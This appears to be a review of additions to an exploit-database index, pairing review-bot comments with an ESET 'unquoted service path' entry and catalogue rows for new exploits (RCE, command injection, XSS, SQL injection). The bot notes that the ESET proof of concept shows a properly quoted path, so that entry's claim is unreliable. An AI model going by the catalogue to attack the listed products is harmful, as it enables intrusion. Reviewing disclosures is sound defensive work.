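Review bot: The header says the escalation goes "from Administrator to NT AUTHORITY / SYSTEM", but nothing in the file states which weak permission or configuration makes that possible, and "# CVE : N/A" leaves no vendor reference to consult. The code renames and recreates sgvpn.exe under "C:\Program Files (x86)\Forcepoint\Stonesoft VPN Client\" and opens the sgipsecvpn service with SERVICE_ALL_ACCESS; document the directory and service ACLs observed on the tested 6.2.0 and 6.8.0 installs, so a defender can check their own hosts and tell whether an unprivileged user is affected or only an account that is already an administrator. Smaller points: ChangeName() is declared bool but always returns 0, and the results of OpenSCManager and OpenService near the end of main are used without a NULL check.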

@ -0,0 +1,23 @@
# Exploit Title: ESET Service 16.0.26.0 - 'Service ekrn' Unquoted Service Path
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Exploit Date: 2023-04-05
# Vendor : https://www.eset.com
# Version : 16.0.26.0
# Tested on OS: Microsoft Windows 11 pro x64
#PoC :
==============
C:\>sc qc ekrn
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ekrn
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\ESET\ESET Security\ekrn.exe"
        LOAD_ORDER_GROUP   : Base
        TAG                : 0
        DISPLAY_NAME       : ESET Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
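Review bot: The PoC output does not show the issue named in the title: the BINARY_PATH_NAME line reads "C:\Program Files\ESET\ESET Security\ekrn.exe" with the double quotes present, which is the correct form for a service path containing spaces. Unless a different service or another source for the path is meant, this entry documents no unquoted service path; ask the author for output that shows one, or withdraw the entry.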

@ -904,6 +904,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48217,exploits/asp/webapps/48217.txt,"Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)",2020-03-16,"Miguel Mendez Z",webapps,asp,,2020-03-16,2020-03-16,0,,,,,, 48217,exploits/asp/webapps/48217.txt,"Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)",2020-03-16,"Miguel Mendez Z",webapps,asp,,2020-03-16,2020-03-16,0,,,,,,
27945,exploits/asp/webapps/27945.txt,"Enigma Haber 4.2 - Cross-Site Scripting",2006-06-02,The_BeKiR,webapps,asp,,2006-06-02,2013-08-30,1,CVE-2006-2873;OSVDB-26230,,,,,https://www.securityfocus.com/bid/18226/info 27945,exploits/asp/webapps/27945.txt,"Enigma Haber 4.2 - Cross-Site Scripting",2006-06-02,The_BeKiR,webapps,asp,,2006-06-02,2013-08-30,1,CVE-2006-2873;OSVDB-26230,,,,,https://www.securityfocus.com/bid/18226/info
1840,exploits/asp/webapps/1840.txt,"Enigma Haber 4.3 - Multiple SQL Injections",2006-05-28,nukedx,webapps,asp,,2006-05-27,,1,OSVDB-26119;CVE-2006-2731;OSVDB-26118;OSVDB-26117;OSVDB-26116;OSVDB-26115;OSVDB-26114;OSVDB-26113;OSVDB-26112;OSVDB-26111;OSVDB-26110;OSVDB-26109;OSVDB-26108;OSVDB-26107;OSVDB-26106,,,,,http://www.nukedx.com/?viewdoc=34 1840,exploits/asp/webapps/1840.txt,"Enigma Haber 4.3 - Multiple SQL Injections",2006-05-28,nukedx,webapps,asp,,2006-05-27,,1,OSVDB-26119;CVE-2006-2731;OSVDB-26118;OSVDB-26117;OSVDB-26116;OSVDB-26115;OSVDB-26114;OSVDB-26113;OSVDB-26112;OSVDB-26111;OSVDB-26110;OSVDB-26109;OSVDB-26108;OSVDB-26107;OSVDB-26106,,,,,http://www.nukedx.com/?viewdoc=34
51335,exploits/asp/webapps/51335.txt,"ENTAB ERP 1.0 - Username PII leak",2023-04-08,"Deb Prasad Banerjee",webapps,asp,,2023-04-08,2023-04-08,0,CVE-2022-30076,,,,,
2989,exploits/asp/webapps/2989.txt,"Enthrallweb eCars 1.0 - 'types.asp' SQL Injection",2006-12-23,ajann,webapps,asp,,2006-12-22,,1,OSVDB-31681;CVE-2006-6803,,,,, 2989,exploits/asp/webapps/2989.txt,"Enthrallweb eCars 1.0 - 'types.asp' SQL Injection",2006-12-23,ajann,webapps,asp,,2006-12-22,,1,OSVDB-31681;CVE-2006-6803,,,,,
29118,exploits/asp/webapps/29118.txt,"Enthrallweb eClassifieds - 'ad.asp' Multiple SQL Injections",2006-11-20,"laurent gaffie",webapps,asp,,2006-11-20,2013-10-22,1,CVE-2006-6208;OSVDB-30571,,,,,https://www.securityfocus.com/bid/21192/info 29118,exploits/asp/webapps/29118.txt,"Enthrallweb eClassifieds - 'ad.asp' Multiple SQL Injections",2006-11-20,"laurent gaffie",webapps,asp,,2006-11-20,2013-10-22,1,CVE-2006-6208;OSVDB-30571,,,,,https://www.securityfocus.com/bid/21192/info
29119,exploits/asp/webapps/29119.txt,"Enthrallweb eClassifieds - 'dircat.asp?cid' SQL Injection",2006-11-20,"laurent gaffie",webapps,asp,,2006-11-20,2013-10-22,1,CVE-2006-6208;OSVDB-30572,,,,,https://www.securityfocus.com/bid/21192/info 29119,exploits/asp/webapps/29119.txt,"Enthrallweb eClassifieds - 'dircat.asp?cid' SQL Injection",2006-11-20,"laurent gaffie",webapps,asp,,2006-11-20,2013-10-22,1,CVE-2006-6208;OSVDB-30572,,,,,https://www.securityfocus.com/bid/21192/info
@ -1834,7 +1835,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48456,exploits/aspx/webapps/48456.txt,"Orchard Core RC1 - Persistent Cross-Site Scripting",2020-05-12,SunCSR,webapps,aspx,,2020-05-12,2020-05-12,0,,,,,, 48456,exploits/aspx/webapps/48456.txt,"Orchard Core RC1 - Persistent Cross-Site Scripting",2020-05-12,SunCSR,webapps,aspx,,2020-05-12,2020-05-12,0,,,,,,
41985,exploits/aspx/webapps/41985.txt,"Personify360 7.5.2/7.6.1 - Improper Access Restrictions",2017-05-09,"Pesach Zirkind",webapps,aspx,,2017-05-09,2017-07-03,0,CVE-2017-7312,,,,, 41985,exploits/aspx/webapps/41985.txt,"Personify360 7.5.2/7.6.1 - Improper Access Restrictions",2017-05-09,"Pesach Zirkind",webapps,aspx,,2017-05-09,2017-07-03,0,CVE-2017-7312,,,,,
41986,exploits/aspx/webapps/41986.txt,"Personify360 7.5.2/7.6.1 - Improper Database Schema Access Restrictions",2017-05-09,"Pesach Zirkind",webapps,aspx,,2017-05-09,2017-07-03,0,CVE-2017-7314,,,,, 41986,exploits/aspx/webapps/41986.txt,"Personify360 7.5.2/7.6.1 - Improper Database Schema Access Restrictions",2017-05-09,"Pesach Zirkind",webapps,aspx,,2017-05-09,2017-07-03,0,CVE-2017-7314,,,,,
51118,exploits/aspx/webapps/51118.txt,"ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)",2023-03-28,"Okan Kurtulus",webapps,aspx,,2023-03-28,2023-03-28,0,CVE-2022-41441,,,,, 51118,exploits/aspx/webapps/51118.txt,"ReQlogic v11.3 - Reflected Cross-Site Scripting (XSS)",2023-03-28,"Okan Kurtulus",webapps,aspx,,2023-03-28,2023-04-08,0,CVE-2022-41441,,,,,
47777,exploits/aspx/webapps/47777.txt,"Roxy Fileman 1.4.5 - Directory Traversal",2019-12-16,"Patrik Lantz",webapps,aspx,,2019-12-16,2019-12-18,0,CVE-2019-19731,,,,, 47777,exploits/aspx/webapps/47777.txt,"Roxy Fileman 1.4.5 - Directory Traversal",2019-12-16,"Patrik Lantz",webapps,aspx,,2019-12-16,2019-12-18,0,CVE-2019-19731,,,,,
47589,exploits/aspx/webapps/47589.txt,"SD.NET RIM 4.7.3c - 'idtyp' SQL Injection",2019-11-05,"Fabian Mosch_ Nick Theisinger",webapps,aspx,80,2019-11-05,2019-11-05,0,,"SQL Injection (SQLi)",,,, 47589,exploits/aspx/webapps/47589.txt,"SD.NET RIM 4.7.3c - 'idtyp' SQL Injection",2019-11-05,"Fabian Mosch_ Nick Theisinger",webapps,aspx,80,2019-11-05,2019-11-05,0,,"SQL Injection (SQLi)",,,,
44285,exploits/aspx/webapps/44285.txt,"SecurEnvoy SecurMail 9.1.501 - Multiple Vulnerabilities",2018-03-13,"SEC Consult",webapps,aspx,,2018-03-13,2018-03-13,0,CVE-2018-7707;CVE-2018-7706;CVE-2018-7705;CVE-2018-7704;CVE-2018-7703;CVE-2018-7702;CVE-2018-7701,,,,, 44285,exploits/aspx/webapps/44285.txt,"SecurEnvoy SecurMail 9.1.501 - Multiple Vulnerabilities",2018-03-13,"SEC Consult",webapps,aspx,,2018-03-13,2018-03-13,0,CVE-2018-7707;CVE-2018-7706;CVE-2018-7705;CVE-2018-7704;CVE-2018-7703;CVE-2018-7702;CVE-2018-7701,,,,,
@ -2795,6 +2796,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
4261,exploits/cgi/webapps/4261.txt,"YNP Portal System 2.2.0 - 'showpage.cgi p' Remote File Disclosure",2007-08-06,GoLd_M,webapps,cgi,,2007-08-05,,1,OSVDB-39198;CVE-2007-4256,,,,, 4261,exploits/cgi/webapps/4261.txt,"YNP Portal System 2.2.0 - 'showpage.cgi p' Remote File Disclosure",2007-08-06,GoLd_M,webapps,cgi,,2007-08-05,,1,OSVDB-39198;CVE-2007-4256,,,,,
30260,exploits/cgi/webapps/30260.txt,"Yoggie Pico and Pico Pro Backticks - Remote Code Execution",2007-07-02,"Cody Brocious",webapps,cgi,,2007-07-02,2013-12-13,1,CVE-2007-3572;OSVDB-37808,,,,,https://www.securityfocus.com/bid/24743/info 30260,exploits/cgi/webapps/30260.txt,"Yoggie Pico and Pico Pro Backticks - Remote Code Execution",2007-07-02,"Cody Brocious",webapps,cgi,,2007-07-02,2013-12-13,1,CVE-2007-3572;OSVDB-37808,,,,,https://www.securityfocus.com/bid/24743/info
39156,exploits/cgi/webapps/39156.txt,"ZamFoo - Multiple Remote Command Execution Vulnerabilities",2014-04-02,Al-Shabaab,webapps,cgi,,2014-04-02,2016-01-03,1,,,,,,https://www.securityfocus.com/bid/67215/info 39156,exploits/cgi/webapps/39156.txt,"ZamFoo - Multiple Remote Command Execution Vulnerabilities",2014-04-02,Al-Shabaab,webapps,cgi,,2014-04-02,2016-01-03,1,,,,,,https://www.securityfocus.com/bid/67215/info
51347,exploits/cgi/webapps/51347.txt,"ZCBS/ZBBS/ZPBS v4.14k - Reflected Cross-Site Scripting (XSS)",2023-04-08,"Abdulaziz Saad",webapps,cgi,,2023-04-08,2023-04-08,0,CVE-2023-26692,,,,,
37830,exploits/cgi/webapps/37830.txt,"ZEN Load Balancer - Multiple Vulnerabilities",2012-09-24,"Brendan Coles",webapps,cgi,,2012-09-24,2016-12-18,1,,,,,,https://www.securityfocus.com/bid/55638/info 37830,exploits/cgi/webapps/37830.txt,"ZEN Load Balancer - Multiple Vulnerabilities",2012-09-24,"Brendan Coles",webapps,cgi,,2012-09-24,2016-12-18,1,,,,,,https://www.securityfocus.com/bid/55638/info
48308,exploits/cgi/webapps/48308.py,"Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal",2020-04-10,"Basim Alabdullah",webapps,cgi,,2020-04-10,2020-04-10,0,,,,,, 48308,exploits/cgi/webapps/48308.py,"Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal",2020-04-10,"Basim Alabdullah",webapps,cgi,,2020-04-10,2020-04-10,0,,,,,,
48373,exploits/cgi/webapps/48373.rb,"Zen Load Balancer 3.10.1 - Directory Traversal (Metasploit)",2020-04-23,"Dhiraj Mishra",webapps,cgi,,2020-04-23,2020-04-23,0,,,,,, 48373,exploits/cgi/webapps/48373.rb,"Zen Load Balancer 3.10.1 - Directory Traversal (Metasploit)",2020-04-23,"Dhiraj Mishra",webapps,cgi,,2020-04-23,2020-04-23,0,,,,,,
@ -3032,6 +3034,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48441,exploits/hardware/dos/48441.sh,"Extreme Networks Aerohive HiveOS 11.0 - Remote Denial of Service (PoC)",2020-05-08,LiquidWorm,dos,hardware,,2020-05-08,2020-05-08,0,,,,,, 48441,exploits/hardware/dos/48441.sh,"Extreme Networks Aerohive HiveOS 11.0 - Remote Denial of Service (PoC)",2020-05-08,LiquidWorm,dos,hardware,,2020-05-08,2020-05-08,0,,,,,,
19064,exploits/hardware/dos/19064.txt,"F5 BIG-IP - Authentication Bypass (PoC)",2012-06-11,"Florent Daigniere",dos,hardware,,2012-06-11,2016-12-09,1,OSVDB-82780;CVE-2012-1493,,,,,https://www.trustmatta.com/advisories/MATTA-2012-002.txt 19064,exploits/hardware/dos/19064.txt,"F5 BIG-IP - Authentication Bypass (PoC)",2012-06-11,"Florent Daigniere",dos,hardware,,2012-06-11,2016-12-09,1,OSVDB-82780;CVE-2012-1493,,,,,https://www.trustmatta.com/advisories/MATTA-2012-002.txt
10947,exploits/hardware/dos/10947.txt,"Facebook for iPhone - Persistent Cross-Site Scripting Denial of Service",2010-01-03,marco_,dos,hardware,,2010-01-02,,1,,,,,, 10947,exploits/hardware/dos/10947.txt,"Facebook for iPhone - Persistent Cross-Site Scripting Denial of Service",2010-01-03,marco_,dos,hardware,,2010-01-02,,1,,,,,,
51326,exploits/hardware/dos/51326.py,"FortiRecorder 6.4.3 - Denial of Service",2023-04-08,"Mohammed Adel",dos,hardware,,2023-04-08,2023-04-08,0,CVE-2022-41333,,,,,
27131,exploits/hardware/dos/27131.py,"Galil-RIO Modbus - Denial of Service",2013-07-27,Sapling,dos,hardware,,2013-07-27,2013-07-27,0,CVE-2013-0699;OSVDB-92804,,,,, 27131,exploits/hardware/dos/27131.py,"Galil-RIO Modbus - Denial of Service",2013-07-27,Sapling,dos,hardware,,2013-07-27,2013-07-27,0,CVE-2013-0699;OSVDB-92804,,,,,
8260,exploits/hardware/dos/8260.txt,"Gigaset SE461 WiMAX Router - Remote Denial of Service",2009-03-23,Benkei,dos,hardware,,2009-03-22,,1,OSVDB-53518;CVE-2009-1152,,,,, 8260,exploits/hardware/dos/8260.txt,"Gigaset SE461 WiMAX Router - Remote Denial of Service",2009-03-23,Benkei,dos,hardware,,2009-03-22,,1,OSVDB-53518;CVE-2009-1152,,,,,
13825,exploits/hardware/dos/13825.txt,"GoodiWare GoodReader iPhone - '.XLS' Denial of Service",2010-06-11,"Matthew Bergin",dos,hardware,,2010-06-10,2016-10-27,1,,,goodreader_poc.xls,,, 13825,exploits/hardware/dos/13825.txt,"GoodiWare GoodReader iPhone - '.XLS' Denial of Service",2010-06-11,"Matthew Bergin",dos,hardware,,2010-06-10,2016-10-27,1,,,goodreader_poc.xls,,,
@ -3847,6 +3850,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50949,exploits/hardware/remote/50949.py,"Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 - Remote Code Execution (RCE)",2022-06-03,LiquidWorm,remote,hardware,,2022-06-03,2022-06-03,0,,,,,, 50949,exploits/hardware/remote/50949.py,"Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 - Remote Code Execution (RCE)",2022-06-03,LiquidWorm,remote,hardware,,2022-06-03,2022-06-03,0,,,,,,
39522,exploits/hardware/remote/39522.txt,"Schneider Electric SBO / AS - Multiple Vulnerabilities",2016-03-03,"Karn Ganeshen",remote,hardware,,2016-03-03,2016-03-03,0,CVE-2016-2278,,,,,https://ics-cert.us-cert.gov/advisories/ICSA-16-061-01 39522,exploits/hardware/remote/39522.txt,"Schneider Electric SBO / AS - Multiple Vulnerabilities",2016-03-03,"Karn Ganeshen",remote,hardware,,2016-03-03,2016-03-03,0,CVE-2016-2278,,,,,https://ics-cert.us-cert.gov/advisories/ICSA-16-061-01
50987,exploits/hardware/remote/50987.ps1,"Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) - Remote Code Execution",2022-07-29,LiquidWorm,remote,hardware,,2022-07-29,2022-07-29,0,,,,,, 50987,exploits/hardware/remote/50987.ps1,"Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) - Remote Code Execution",2022-07-29,LiquidWorm,remote,hardware,,2022-07-29,2022-07-29,0,,,,,,
51320,exploits/hardware/remote/51320.txt,"Schneider Electric v1.0 - Directory traversal & Broken Authentication",2023-04-07,"Parsa Rezaie Khiabanloo",remote,hardware,,2023-04-07,2023-04-08,0,,,,,,
50936,exploits/hardware/remote/50936.txt,"SDT-CW3B1 1.1.0 - OS Command Injection",2022-05-17,"Ahmed Alroky",remote,hardware,,2022-05-17,2022-05-17,0,CVE-2021-46422,,,,, 50936,exploits/hardware/remote/50936.txt,"SDT-CW3B1 1.1.0 - OS Command Injection",2022-05-17,"Ahmed Alroky",remote,hardware,,2022-05-17,2022-05-17,0,CVE-2021-46422,,,,,
37184,exploits/hardware/remote/37184.py,"Seagate Central 2014.0410.0026-F - Remote Command Execution",2015-06-03,"Jeremy Brown",remote,hardware,,2015-06-04,2016-12-04,0,OSVDB-122937,,,,, 37184,exploits/hardware/remote/37184.py,"Seagate Central 2014.0410.0026-F - Remote Command Execution",2015-06-03,"Jeremy Brown",remote,hardware,,2015-06-04,2016-12-04,0,OSVDB-122937,,,,,
43659,exploits/hardware/remote/43659.md,"Seagate Personal Cloud - Multiple Vulnerabilities",2018-01-11,SecuriTeam,remote,hardware,,2018-01-16,2018-01-16,0,CVE-2018-5347,,,,,https://blogs.securiteam.com/index.php/archives/3548 43659,exploits/hardware/remote/43659.md,"Seagate Personal Cloud - Multiple Vulnerabilities",2018-01-11,SecuriTeam,remote,hardware,,2018-01-16,2018-01-16,0,CVE-2018-5347,,,,,https://blogs.securiteam.com/index.php/archives/3548
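Review bot: The added row 51320 is titled "Schneider Electric v1.0 - Directory traversal & Broken Authentication", which gives a vendor and a version but no product, unlike the neighbouring Schneider Electric rows that name the device (C-Bus Automation Controller, SpaceLogic C-Bus Home Controller). Add the product name so the row is searchable and can be matched against an asset inventory. Its codes column is also empty, so the source file should say whether a CVE has been requested.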
@ -3989,6 +3993,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48736,exploits/hardware/webapps/48736.txt,"All-Dynamics Digital Signage System 2.0.2 - Cross-Site Request Forgery (Add Admin)",2020-08-07,LiquidWorm,webapps,hardware,,2020-08-07,2020-08-07,0,,,,,, 48736,exploits/hardware/webapps/48736.txt,"All-Dynamics Digital Signage System 2.0.2 - Cross-Site Request Forgery (Add Admin)",2020-08-07,LiquidWorm,webapps,hardware,,2020-08-07,2020-08-07,0,,,,,,
32545,exploits/hardware/webapps/32545.txt,"Allied Telesis AT-RG634A ADSL Broadband Router - Web Shell",2014-03-26,"Groundworks Technologies",webapps,hardware,80,2014-03-26,2014-03-26,0,CVE-2014-1982;OSVDB-105060,,,,, 32545,exploits/hardware/webapps/32545.txt,"Allied Telesis AT-RG634A ADSL Broadband Router - Web Shell",2014-03-26,"Groundworks Technologies",webapps,hardware,80,2014-03-26,2014-03-26,0,CVE-2014-1982;OSVDB-105060,,,,,
20667,exploits/hardware/webapps/20667.txt,"Alpha Networks ADSL2/2+ Wireless Router ASL-26555 - Password Disclosure",2012-08-20,"Alberto Ortega",webapps,hardware,,2012-08-20,2012-08-20,0,OSVDB-85508,,,,, 20667,exploits/hardware/webapps/20667.txt,"Alpha Networks ADSL2/2+ Wireless Router ASL-26555 - Password Disclosure",2012-08-20,"Alberto Ortega",webapps,hardware,,2012-08-20,2012-08-20,0,OSVDB-85508,,,,,
51325,exploits/hardware/webapps/51325.py,"Altenergy Power Control Software C1.2.5 - OS command injection",2023-04-08,"Ahmed Alroky",webapps,hardware,,2023-04-08,2023-04-08,0,CVE-2023-28343,,,,,
9975,exploits/hardware/webapps/9975.txt,"Alteon OS BBI (Nortell) - Cross-Site Scripting / Cross-Site Request Forgery",2009-11-16,"Alexey Sintsov",webapps,hardware,80,2009-11-15,,1,OSVDB-60315;OSVDB-60314,,,,, 9975,exploits/hardware/webapps/9975.txt,"Alteon OS BBI (Nortell) - Cross-Site Scripting / Cross-Site Request Forgery",2009-11-16,"Alexey Sintsov",webapps,hardware,80,2009-11-15,,1,OSVDB-60315;OSVDB-60314,,,,,
47188,exploits/hardware/webapps/47188.py,"Amcrest Cameras 2.520.AC00.18.R - Unauthenticated Audio Streaming",2019-07-30,"Jacob Baines",webapps,hardware,,2019-07-30,2019-07-30,1,CVE-2019-3948,"Authentication Bypass / Credentials Bypass (AB/CB)",,,,https://www.tenable.com/security/research/tra-2019-36 47188,exploits/hardware/webapps/47188.py,"Amcrest Cameras 2.520.AC00.18.R - Unauthenticated Audio Streaming",2019-07-30,"Jacob Baines",webapps,hardware,,2019-07-30,2019-07-30,1,CVE-2019-3948,"Authentication Bypass / Credentials Bypass (AB/CB)",,,,https://www.tenable.com/security/research/tra-2019-36
37298,exploits/hardware/webapps/37298.txt,"Apexis IP CAM - Information Disclosure",2015-06-16,"Sunplace Solutions",webapps,hardware,80,2015-06-16,2016-10-10,1,OSVDB-123251,,,,, 37298,exploits/hardware/webapps/37298.txt,"Apexis IP CAM - Information Disclosure",2015-06-16,"Sunplace Solutions",webapps,hardware,80,2015-06-16,2016-10-10,1,OSVDB-123251,,,,,
@ -5400,6 +5405,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48380,exploits/java/webapps/48380.txt,"Furukawa Electric ConsciusMAP 2.8.1 - Remote Code Execution",2020-04-24,LiquidWorm,webapps,java,,2020-04-24,2020-04-24,0,,,,,, 48380,exploits/java/webapps/48380.txt,"Furukawa Electric ConsciusMAP 2.8.1 - Remote Code Execution",2020-04-24,LiquidWorm,webapps,java,,2020-04-24,2020-04-24,0,,,,,,
44668,exploits/java/webapps/44668.py,"GitBucket 4.23.1 - Remote Code Execution",2018-05-21,"Kacper Szurek",webapps,java,,2018-05-21,2018-05-21,0,,,,,http://www.exploit-db.comgitbucket.war, 44668,exploits/java/webapps/44668.py,"GitBucket 4.23.1 - Remote Code Execution",2018-05-21,"Kacper Szurek",webapps,java,,2018-05-21,2018-05-21,0,,,,,http://www.exploit-db.comgitbucket.war,
39241,exploits/java/webapps/39241.py,"GlassFish Server - Arbitrary File Read",2016-01-15,bingbing,webapps,java,4848,2016-01-27,2016-01-27,1,,,,http://www.exploit-db.com/screenshots/idlt39500/screen-shot-2016-01-26-at-194716.png,, 39241,exploits/java/webapps/39241.py,"GlassFish Server - Arbitrary File Read",2016-01-15,bingbing,webapps,java,4848,2016-01-27,2016-01-27,1,,,,http://www.exploit-db.com/screenshots/idlt39500/screen-shot-2016-01-26-at-194716.png,,
51339,exploits/java/webapps/51339.java,"Goanywhere Encryption helper 7.1.1 - Remote Code Execution (RCE)",2023-04-08,"Youssef Muhammad",webapps,java,,2023-04-08,2023-04-08,0,CVE-2023-0669,,,,,
41466,exploits/java/webapps/41466.py,"Grails PDF Plugin 0.6 - XML External Entity Injection",2017-02-21,"Charles Fol",webapps,java,,2017-02-27,2017-02-27,0,,,,,http://www.exploit-db.comgrails-pdf-0.6.zip, 41466,exploits/java/webapps/41466.py,"Grails PDF Plugin 0.6 - XML External Entity Injection",2017-02-21,"Charles Fol",webapps,java,,2017-02-27,2017-02-27,0,,,,,http://www.exploit-db.comgrails-pdf-0.6.zip,
28116,exploits/java/webapps/28116.txt,"H-Sphere 2.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-27,r0t,webapps,java,,2006-06-27,2013-09-06,1,,,,,,https://www.securityfocus.com/bid/18677/info 28116,exploits/java/webapps/28116.txt,"H-Sphere 2.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-27,r0t,webapps,java,,2006-06-27,2013-09-06,1,,,,,,https://www.securityfocus.com/bid/18677/info
22752,exploits/java/webapps/22752.txt,"H-Sphere 2.x - HTML Template Inclusion Cross-Site Scripting",2003-06-09,"Lorenzo Hernandez Garcia-Hierro",webapps,java,,2003-06-09,2012-11-16,1,OSVDB-4329,,,,,https://www.securityfocus.com/bid/7855/info 22752,exploits/java/webapps/22752.txt,"H-Sphere 2.x - HTML Template Inclusion Cross-Site Scripting",2003-06-09,"Lorenzo Hernandez Garcia-Hierro",webapps,java,,2003-06-09,2012-11-16,1,OSVDB-4329,,,,,https://www.securityfocus.com/bid/7855/info
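Review bot: the title on row 51339 names the product as "Goanywhere Encryption helper 7.1.1", but CVE-2023-0669 in the codes column is assigned to GoAnywhere MFT, so a search for the affected product by name will miss this row. Suggest the title lead with the product and version (GoAnywhere MFT 7.1.1) and keep "encryption helper" as a description of what 51339.java does, with the vendor's capitalisation.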
@ -5821,6 +5827,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
15290,exploits/jsp/webapps/15290.txt,"Oracle Sun Java System Web Server - HTTP Response Splitting",2010-10-20,"Roberto Suggi Liverani",webapps,jsp,,2010-10-20,2010-10-20,0,CVE-2010-3514,,,,, 15290,exploits/jsp/webapps/15290.txt,"Oracle Sun Java System Web Server - HTTP Response Splitting",2010-10-20,"Roberto Suggi Liverani",webapps,jsp,,2010-10-20,2010-10-20,0,CVE-2010-3514,,,,,
25198,exploits/jsp/webapps/25198.txt,"OutStart Participate Enterprise 3 - Multiple Access Validation Vulnerabilities",2005-03-08,Altrus,webapps,jsp,,2005-03-08,2013-05-04,1,,,,,,https://www.securityfocus.com/bid/12752/info 25198,exploits/jsp/webapps/25198.txt,"OutStart Participate Enterprise 3 - Multiple Access Validation Vulnerabilities",2005-03-08,Altrus,webapps,jsp,,2005-03-08,2013-05-04,1,,,,,,https://www.securityfocus.com/bid/12752/info
9958,exploits/jsp/webapps/9958.txt,"Pentaho 1.7.0.1062 - Cross-Site Scripting / Information Disclosure",2009-10-15,antisnatchor,webapps,jsp,,2009-10-14,,1,CVE-2006-5675;OSVDB-33926,,,,,http://antisnatchor.com/2009/06/20/pentaho-1701062-multiple-vulnerabilities/ 9958,exploits/jsp/webapps/9958.txt,"Pentaho 1.7.0.1062 - Cross-Site Scripting / Information Disclosure",2009-10-15,antisnatchor,webapps,jsp,,2009-10-14,,1,CVE-2006-5675;OSVDB-33926,,,,,http://antisnatchor.com/2009/06/20/pentaho-1701062-multiple-vulnerabilities/
51350,exploits/jsp/webapps/51350.txt,"Pentaho BA Server EE 9.3.0.0-428 - Remote Code Execution (RCE) (Unauthenticated)",2023-04-08,dwbzn,webapps,jsp,,2023-04-08,2023-04-08,0,CVE-2022-43939;CVE-2022-43769,,,,,
38235,exploits/jsp/webapps/38235.txt,"Perforce P4Web - Multiple Cross-Site Scripting Vulnerabilities",2013-01-22,"Christy Philip Mathew",webapps,jsp,,2013-01-22,2015-09-18,1,CVE-2013-1410;OSVDB-89567,,,,,https://www.securityfocus.com/bid/57514/info 38235,exploits/jsp/webapps/38235.txt,"Perforce P4Web - Multiple Cross-Site Scripting Vulnerabilities",2013-01-22,"Christy Philip Mathew",webapps,jsp,,2013-01-22,2015-09-18,1,CVE-2013-1410;OSVDB-89567,,,,,https://www.securityfocus.com/bid/57514/info
25628,exploits/jsp/webapps/25628.txt,"phpBB 2.0.x - 'BBCode.php' URL Tag",2005-05-09,Papados,webapps,jsp,,2005-05-09,2013-05-22,1,CVE-2005-1193;OSVDB-16439,,,,,https://www.securityfocus.com/bid/13545/info 25628,exploits/jsp/webapps/25628.txt,"phpBB 2.0.x - 'BBCode.php' URL Tag",2005-05-09,Papados,webapps,jsp,,2005-05-09,2013-05-22,1,CVE-2005-1193;OSVDB-16439,,,,,https://www.securityfocus.com/bid/13545/info
32708,exploits/jsp/webapps/32708.txt,"Plunet BusinessManager 4.1 - '/pagesUTF8/auftrag_allgemeinauftrag.jsp' Multiple Cross-Site Scripting Vulnerabilities",2009-01-07,"Matteo Ignaccolo",webapps,jsp,,2009-01-07,2014-04-07,1,CVE-2009-0699;OSVDB-52965,,,,,https://www.securityfocus.com/bid/33153/info 32708,exploits/jsp/webapps/32708.txt,"Plunet BusinessManager 4.1 - '/pagesUTF8/auftrag_allgemeinauftrag.jsp' Multiple Cross-Site Scripting Vulnerabilities",2009-01-07,"Matteo Ignaccolo",webapps,jsp,,2009-01-07,2014-04-07,1,CVE-2009-0699;OSVDB-52965,,,,,https://www.securityfocus.com/bid/33153/info
@ -7004,6 +7011,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
44601,exploits/linux/local/44601.txt,"GNU wget - Cookie Injection",2018-05-06,"Harry Sintonen",local,linux,,2018-05-09,2018-05-09,0,CVE-2018-0494,,,,,http://seclists.org/fulldisclosure/2018/May/20 44601,exploits/linux/local/44601.txt,"GNU wget - Cookie Injection",2018-05-06,"Harry Sintonen",local,linux,,2018-05-09,2018-05-09,0,CVE-2018-0494,,,,,http://seclists.org/fulldisclosure/2018/May/20
3154,exploits/linux/local/3154.c,"GNU/Linux mbse-bbs 0.70.0 - Local Buffer Overflow",2007-01-18,prdelka,local,linux,,2007-01-17,2011-09-15,1,OSVDB-33551;CVE-2007-0368,,,,http://www.exploit-db.commbsebbs-0.70.0.tar, 3154,exploits/linux/local/3154.c,"GNU/Linux mbse-bbs 0.70.0 - Local Buffer Overflow",2007-01-18,prdelka,local,linux,,2007-01-17,2011-09-15,1,OSVDB-33551;CVE-2007-0368,,,,http://www.exploit-db.commbsebbs-0.70.0.tar,
27231,exploits/linux/local/27231.txt,"GnuPG 1.x - Detached Signature Verification Bypass",2006-02-15,taviso,local,linux,,2006-02-15,2013-07-31,1,CVE-2006-0455;OSVDB-23221,,,,,https://www.securityfocus.com/bid/16663/info 27231,exploits/linux/local/27231.txt,"GnuPG 1.x - Detached Signature Verification Bypass",2006-02-15,taviso,local,linux,,2006-02-15,2013-07-31,1,CVE-2006-0455;OSVDB-23221,,,,,https://www.securityfocus.com/bid/16663/info
